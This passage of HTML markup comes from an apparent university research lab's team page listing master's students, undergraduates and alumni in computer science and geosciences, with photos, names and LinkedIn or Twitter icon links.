<br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c228-outer\">\n <div data-colibri-id=\"182-c228\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c228 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c229\" class=\"d-block style-854 style-local-182-c229 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Shreyatadipaneni.jpg\" class=\"wp-image-1875 style-854-image style-local-182-c229-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c229-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c230\" class=\"h-global-transition-all h-heading style-850 style-local-182-c230 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c230\">\n <!---->\n <!---->\n <h4 class=\"\">Shreya Tadipaneni</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c231\" class=\"h-text h-text-component style-851 style-local-182-c231 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c232\" class=\"h-text h-text-component style-902 style-local-182-c232 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c233\" class=\"style-855 style-local-182-c233 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/shreya-tadipaneni-22a4451a6/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c234-outer\">\n <div data-colibri-id=\"182-c234\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c234 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c235\" class=\"d-block style-854 style-local-182-c235 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Anshul-Gupta.jpg\" class=\"wp-image-1876 style-854-image style-local-182-c235-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c235-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c236\" class=\"h-global-transition-all h-heading style-850 style-local-182-c236 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c236\">\n <!---->\n <!---->\n <h4 class=\"\">Anshul Gupta</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c237\" class=\"h-text h-text-component style-851 style-local-182-c237 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c238\" class=\"h-text h-text-component style-902 style-local-182-c238 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c239\" class=\"style-855 style-local-182-c239 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/anshulgupta-panther/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c149\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c149 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c156\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c156 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c157-outer\">\n <div data-colibri-id=\"182-c157\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c157 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c158\" class=\"h-global-transition-all h-heading style-844 style-local-182-c158 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-844 style-local-182-c158\">\n <!---->\n <!---->\n <h2 class=\"\">Undergraduates</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c150\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c150 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c151-outer\">\n <div data-colibri-id=\"182-c151\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c151 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c152\" class=\"d-block style-831 style-local-182-c152 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c152-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c152-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c153\" class=\"h-global-transition-all h-heading style-832 style-local-182-c153 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-832 style-local-182-c153\">\n <!---->\n <!---->\n <h4 class=\"\">MD Raiyan Haque</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c154\" class=\"h-text h-text-component style-833 style-local-182-c154 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c155\" class=\"style-835 style-local-182-c155 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\" 4:40 PM https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c159\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c159 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c225\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c225 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c226-outer\">\n <div data-colibri-id=\"182-c226\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c226 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c227\" class=\"h-global-transition-all h-heading style-926 style-local-182-c227 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-926 style-local-182-c227\">\n <!---->\n <!---->\n <h2 class=\"\">Alumni</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c160\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c160 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c161-outer\">\n <div data-colibri-id=\"182-c161\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c161 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c162\" class=\"d-block style-913 style-local-182-c162 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c162-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c162-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c163\" class=\"h-global-transition-all h-heading style-914 style-local-182-c163 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c163\">\n <!---->\n <!---->\n <h4 class=\"\">Sarah Akinola</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c164\" class=\"h-text h-text-component style-915 style-local-182-c164 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c165\" class=\"style-917 style-local-182-c165 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c166-outer\">\n <div data-colibri-id=\"182-c166\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c166 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c167\" class=\"d-block style-918 style-local-182-c167 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c167-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c167-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c168\" class=\"h-global-transition-all h-heading style-914 style-local-182-c168 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c168\">\n <!---->\n <!---->\n <h4 class=\"\">Anvith Anand</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c169\" class=\"h-text h-text-component style-915 style-local-182-c169 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c170\" class=\"style-919 style-local-182-c170 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c171-outer\">\n <div data-colibri-id=\"182-c171\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c171 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c172\" class=\"d-block style-920 style-local-182-c172 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c172-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c172-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c173\" class=\"h-global-transition-all h-heading style-914 style-local-182-c173 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c173\">\n <!---->\n <!---->\n <h4 class=\"\">Alex Asige</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c174\" class=\"h-text h-text-component style-915 style-local-182-c174 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c175\" class=\"style-921 style-local-182-c175 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon 